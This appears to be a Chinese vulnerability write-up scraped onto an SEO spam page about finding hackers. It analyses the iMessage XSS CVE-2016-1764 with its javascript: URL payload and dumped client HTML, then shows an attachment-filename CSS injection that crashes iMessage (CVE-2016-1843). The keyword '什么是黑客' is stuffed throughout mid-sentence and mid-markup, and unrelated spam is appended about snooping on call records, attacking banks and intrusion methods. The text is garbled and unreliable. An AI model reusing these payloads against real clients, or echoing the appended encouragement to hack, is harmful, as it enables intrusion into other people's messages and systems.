*** 上如何找黑客-iMessage 0day(CVE-2016-1843) 挖掘实录
注:文章里“0day”在汇报给官方网后分派系统漏洞序号:CVE-2016-1843
在前几日外国人公布了一个在三月升级里恢复的iMessage xss漏洞(CVE-2016-1764)关键点 :
https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
https://github.com/BishopFox/cve-2016-1764
她们什么是黑客发布这种关键点里实际上沒有得出详尽开启点的剖析,我剖析后也就是依据这种信息内容发觉了一个新的0day。
0x02 CVE-2016-1764 系统漏洞剖析
CVE-2016-1764 里的非常简单的开启 Payload:javascript://a/research? prompt(1) 能够看得出这个是很显著 javascript 协议书里的一个小窍门 没解决后造成 的 xss,这一 tips 在找 xss 系统漏洞里是较为普遍的。
这一非常值得提一下的是为什么要用 prompt(1) 而大家常见的是 alert(1) ,我具体检测了下发觉 alert 的确没法弹出窗口,此外在许多 的网址实际上把 alert 立即和睦过虑了,因此 这儿给提示大伙儿的是在检测 xss 的情况下什么是黑客,把 prompt 更换 alert 是必须的~
碰到那样的手机客户端的 xss 假如要剖析,之一步应当看一下 location.href 的信息内容。这一主要是看是哪个域下,这一系统漏洞是在 applewebdata:// 协议书下,这一原系统漏洞剖析里有得出。随后需看实际的开启点,一般在浏览器下我们可以根据看html源码来剖析,可是在手机客户端下一般看不见,因此 这儿采用一个小窍门:
javascript://a/research? prompt(1,document.head.innerHTML)
这儿是看 html 里的 head 编码:
@media screen and (-webkit-device-pixel-ratio:2){什么是黑客}link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">
继续看下body的编码:
javascript://a/research? prompt(1,document.body.innerHTML)
chatitem id="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" 什么是黑客 contiguous="no" role="heading" aria-level="1" item-type="header">header guid="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">headermessage text-direction="ltr">与“xxx@xxx.com”开展 iMessage 通讯/headermessage>/header>/chatitem>chatitem id="d:E4BCBB48-92什么是黑客86-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp">timestamp guid="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">date date="481908183.907740">今日 23:23/date>/timestamp>/chatitem>chatitem id="p:0什么是黑客/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes">message guid="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" 什么是黑客 service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes">buddyicon role="img" aria-label="什么是黑客黑哥">div>/div>/buddyicon>messagetext>messagebody title="今日 23:23:03" aria-label="javascript://a/research? prompt(1,document.body.innerHTML)">messagetextcontainer text-direction="ltr">span style="">a href=" " title="javascript://a/research?
prompt(1,document.body.innerHTML)">javascript://a/research? prompt(1,document.body.innerHTML)
prompt(1,document.body.innerHTML)">javascript://a/research? prompt(1,document.body.innerHTML)compact">p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" chatitem-message="yes" role="presentation" display-type="什么是黑客balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes">p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E30什么是黑客1475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes">img" aria-label="黑哥">今日 23:24:51" aria-label="javascript://a/research? prompt(1,document.head.innerHTML)">prompt(1,document.head.innerHTML)">javascript://a/research?\r%0什么是黑客aprompt(1,document.head.innerHTML)compact">s:AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" role="heading" aria-level="1" item-type="status" receipt-fade="in">YES" id="receipt-delivered-s:ae1abcf1-2397-4f20-a71f-d71ffe8042f5">receipt-container">receipt-item">已送到p:0/什么是黑客43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display- type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" typing-indicator="no" 什么是黑客 sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes">img" aria-label="黑哥">今天 23:24:51" aria-label="javascript://a/research?什么是黑客%0d%0aprompt(1,document.head.innerHTML)">
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)compact">/date>/message>spacer>/spacer>/chatitem>
那么关键的触发点:
a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="什么是黑客javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)
javascript 直接进入 a 标签里的 href,导致点击执行。新版本的修复方案是直接不解析 javascript:// 。
0x03 从老漏洞 (CVE-2016-1764) 到 0day
XSS的漏洞本质是你注入的代码最终被解析执行了,既然我们看到了document.head.innerHTML 的情况,那么有没有其他注入代码的机会呢?首先我测试的肯定什么是黑客是还是那个点,尝试用 " 及 去闭合,可惜都被过滤了,这个点不行我们可以看看其他存在输入的点,于是我尝试发个附件看看解析情况,部分代码如下:
chatitem id="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" 什么是黑客 group-last-message-ignore-timestamps="yes">message guid="p:0/
FE98E898-0385-41E6-933F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" 什么是黑客 group-first-message="yes" group-last-message="yes">buddyicon role="img" aria-label="黑哥">div>/div>/
buddyicon>messagetext>messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件传输: tttt.html">messagetextcontainer text-
direction="ltr">transfer 什么是黑客 class="transfer" id="45B8E6BD-9826-47E2-B910-
D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-
D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F"> img class="transfer-icon" 什么是黑客 extension="html" aria-label="文件扩展名: html" style="content: -webkit-
image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);">span class="transfer-text" color-
important="no">tttt/span>/transfer-atom>div 什么是黑客 class="transfer-button-container"> img class="transfer-button-reveal" aria-label="显示"
id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button">/div>/transfer>/messagetextcontainer>/messagebody>message-overlay>
/message-overlay>/messagetext>date 什么是黑客 class="compact">/date>/message>spacer>/spacer>/chatitem>
发了个 tttt.html 的附件,这个附件的文件名出现在代码里,或许有控制的机会。多长测试后发现过滤也比较严格,不过最终还是发现一个潜在的点,也就是文件名的扩展名部分:
chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" 什么是黑客 item-type="attachment"
group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" 什么是黑客 emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes">buddyicon role="img" aria-label="黑哥">div>/div>/buddyicon>messagetext>messagebody title="今天 16:46:10"
file-transfer-element="yes" aria-label="文件传输: 什么是黑客 testzzzzzzz"'>
src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d">messagetextcontainer text-direction="ltr">transfer class="transfer" id="A6BE6666-ADBF-4039-BF45-042D261EA458"
guid="A6BE6666-ADBF-4039-BF45-042D261EA458">transfer-atom draggable="true"
aria-label="testzzzzzzz"'>.htm::16) 什么是黑客 1x, (aaa\\\\\\\\\\\%0a%0d" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458"> img
class="transfer-icon" extension="htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" aria-label="文件扩展名:
htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" style="content: 什么是黑客 -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/
htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);">span class="transfer-text" color-important="no">testzzzzzzz"'>
class="transfer-button-container">transfer-button-reveal" 什么是黑客 aria-label="显示"
id="filetransfer-button-A6BE6666-ADBF-4039-BF45-042D261EA458" role="button">
class="compact">/date>/message>spacer>/spacer>/chatitem>
我们提交的附件的后缀进入了style :
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 什么是黑客 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);
也就是可能导致 css 注入,或许我们还有机会,不过经过测试也是有过滤处理的,比如 / 直接被转为了: ,这个非常有意思,所谓“成也萧何,败也萧何”,如果你要注入 css 那么肯定给属性给值就得用 : 但是 : 又不能出现在文件名里,然后我们要注入 css 里掉用远程 css 或者图片需要用 / 而 / 又被处理了变成了 :
不管怎么样我先注入个css测试下,于是提交了一附件名:
zzzzzz.htm) 1x);color/red;aaa/((
按推断 / 变为了 : 如果注入成功应该是:
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x);color:red;aaa:((
当我提交测试发送这个附件的时候,我的iMessage 崩溃了~~ 这里我想我发现了一个新的漏洞,于是我升级OSX到最新的系统重新测试结果:一个全新的0day诞生!
0x04 后记
当然这里还有很多地方可以测试,也有一些思路也可以去测试下,比如那个名字那里这个应该是可控制的什么是黑客,比如附件是保存在本地的有没有可能存在目录专挑导致写到任意目录的地方。有需求的可以继续测试下,说不定下个0day就是你的 :)
最后我想说的是在分析别人发现的漏洞的时候一定要找到漏洞的关键,然后总结提炼出“模型”,然后去尝试新的攻击思路或者界面!
。防火墙提示系统被攻击常见的个人防火墙程序所谓的“攻击”并不一定是真正的 *** 攻击,很多防火墙程序会将 *** 广播等最常见的 *** 访问当作攻击来。 *** 上怎么找黑客
女主是顶级黑客zC段:一般是指C段网段,也叫做‘C段渗透’IP范围192.0.0.1到223.255.255.254C段服务器:是站群服务器的IP网段,IP地址。
*** 上怎么找黑客2014-03-13 黑客能不什么是黑客能侵入移动查看别人的通话详单 2018-06-12 有没有能查通话记录的? 2014-02-23 听说电脑高手的人可以查别人的通话记录、短信。是。
少女杀手思诺 扮演者 张子枫 剧情简介 天赋异禀的结巴少年秦风(刘昊然 饰)警校落榜,被姥姥遣送泰国找远房表舅——号。
违法呗,中国黑客不差你一个,抓你又如何,有那个技术去哪家 *** 公司不给高薪,银行防盗系统最弱,干嘛不去攻击银行,人家微信团队可不是吃素的。 *** 上怎么找黑客
黑客是入侵别人电脑的 *** 有9种。1、获取口令这又有三种 *** :一是通过 *** 监听非法得到用户口令,这类 *** 有一定的局限性,但危害性极大,监听者往往。
*** 上怎么找黑客所谓黑客程序,是指一种无传染性的系统安全屏蔽程序。它被植入计算机系统,一旦黑客程序感染了计算机,便与黑客里应外合什么是黑客,使黑客攻击变得十分容易。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
